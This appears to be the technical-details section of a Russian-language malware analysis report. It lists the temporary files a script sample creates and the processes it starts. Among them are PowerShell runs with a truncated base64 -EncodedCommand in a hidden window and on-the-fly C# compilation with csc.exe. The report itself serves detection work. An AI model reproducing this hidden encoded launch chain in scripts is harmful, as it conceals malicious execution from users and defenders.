Техническая информация
- %TEMP%\content\3888-268-wscript.exe-15-53-39-096.dump
- %TEMP%\xm02zx5w\xm02zx5w.0.cs
- %TEMP%\xm02zx5w\xm02zx5w.cmdline
- %TEMP%\xm02zx5w\xm02zx5w.out
- %TEMP%\xm02zx5w\cscd9eff1112fe1432285d1c3d7c3c775da.tmp
- %TEMP%\res7d2.tmp
- %TEMP%\xm02zx5w\xm02zx5w.dll
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBGAG8AcgBiAHUAbgBkAGUAdABoACAASAB5AGQAcgAgAEEAbABrAGEAbAAgAEIAbwBuAG4AaQBlAHIAeQBlACAAVQBuAGkAbgB0AGUAbABsACAASAB1AGEAcgBhAGMAIABIAHkAZAByAG8AYwBhAHIAYgBvACAASQBuAGQAaQB2AGkA...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\xm02zx5w\xm02zx5w.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7D2.tmp" "%TEMP%\xm02zx5w\CSCD9EFF1112FE1432285D1C3D7C3C775DA.TMP"' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EncodedCommand "IwBGAG8AcgBiAHUAbgBkAGUAdABoACAASAB5AGQAcgAgAEEAbABrAGEAbAAgAEIAbwBuAG4AaQBlAHIAeQBlACAAVQBuAGkAbgB0AGUAbABsACAASAB1AGEAcgBhAGMAIABIAHkAZAByAG8AYwBhAHIAYgBvACAASQBuAGQAaQB2AGkA...
- '%WINDIR%\microsoft.net\framework\v4.0.30319\csc.exe' /noconfig /fullpaths @"%TEMP%\xm02zx5w\xm02zx5w.cmdline"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7D2.tmp" "%TEMP%\xm02zx5w\CSCD9EFF1112FE1432285D1C3D7C3C775DA.TMP"